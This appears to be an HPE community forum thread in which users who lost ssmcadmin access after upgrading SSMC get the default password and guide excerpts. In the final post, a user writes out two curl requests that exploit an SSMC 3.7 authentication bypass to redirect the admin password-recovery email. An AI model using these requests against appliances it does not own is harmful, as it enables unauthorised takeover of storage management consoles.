1753720 Members
5114 Online
108799 Solutions
New Discussion юеВ

Re: SSMC Admin password

SOLVED
Go to solution

Updating SSMC from 3.5 to 3.6.X does not change the ssmcadmin password.

The default password of the ssmcadmin account is "ssmcadmin".

However due to the enforced password policy, this password must be changed when you first-login to the appliance.

If you can┬┤t login with the ssmcadmin account, then you will need to reinstall the appliance.

I am an HPE Employee

Accept or Kudo

eduard vrieling_1
Occasional Advisor

ssmcadmin, even if I change the password in the config when deploying the ova file

NathanOldfield
Occasional Visitor

I have just had the same problem.  Upgraded from 3.5 to 3.6 and now the admin password does not work.

plasticwax
Frequent Visitor

been looking for default password for ages. thank you so much.

Please HP work on your documentation its horribly organised, you cant search for anything.

@plasticwax 

What is the SSMC version that you are using where you have password issue ?

As per SSMC 3.7 admin guide (page no 37, 39 and 40) talks about passwords and default password,

https://support.hpe.com/hpesc/public/docDisplay?docId=a00101449en_us&docLocale=en_US

IMPORTANT: Unified Login credentials for Administrative Access from SSMC 3.6 onwards (Page 48 of same doc)

From HPE SSMC 3.6 release onwards, the web administrator account is merged with the appliance administrator account. As a result, there is a single locally defined application administrator account for all ofSSMC.

If you are upgrading from a version prior to HPE SSMC 3.6 release, then the web administrator credentials, ifdefined already, expires and you have to use the ssmcadmin (same password that you use for appliance access) to log in to the web GUI as well.

This single local account (ssmcadmin) remains as the only emergency account for all of SSMC. The administrator retains access to the web administrator console session as long as that authenticated web sessionis active.

From HPE SSMC 3.6 release onwards, administrators can reset password using the Forgot Password link available on the web login page. The TUI menu option to clear admin credentials is unavailable

There are lots of useful information available related to ssmcadmin account from the above document.

Hope this helps!
Regards
Subhajit

I am an HPE employee

If you feel this was helpful please click the KUDOS! thumb below!

***********************************************************************************

I work for HPE
Accept or Kudo
MarcoMilone
Advisor

Hi,i have same issue. I upgrade from 3.5 to 3.7 and now i cannot login in Administration console.

I tried ssmcadmin, Administrator ... Nothing.. I tried all combinations of users and password.

How can reset the password? it's Hyper-V appliance

MarcoMilone
Advisor

Hi, I found the solution. Only for version 3.7.0.0.449 .

The only way is hack the ssmc . I'm not kidding, unfortunately.
Source : https://www.mindpointgroup.com/blog/hpe-3par-authentication-bypass-vulnerability/

In my case i sent 2 post with curl and in one minute i unlock the console.

curl -k --header "Content-Type: application/json" \
--request POST \
--data '{"defaultavailable":true, "isMenuItemChanged":false, "isdefault":false, "name":"globalprefs-adminconsole-preferences-smtpserver","value":"smtp.mydomanin.com"}' \
https://3par-ssmc.mydomain.local:8443/foundation/REST/preferencesservice/ssmcadmin/preferences

curl -k --header "Content-Type: application/json" \
--request POST \
--data '{"defaultavailable":true, "isMenuItemChanged":false, "isdefault":false, "name":"globalprefs-adminconsole-preferences-passwordrecoveryemail","value":"validemail@mydomain.com"}' \
https://3par-ssmc.mydomain.local:8443/foundation/REST/preferencesservice/ssmcadmin/preferences

The question I ask myself is: Is the bug intentional? If so it is very serious. It is equally bad that after the update you cannot connect anymore!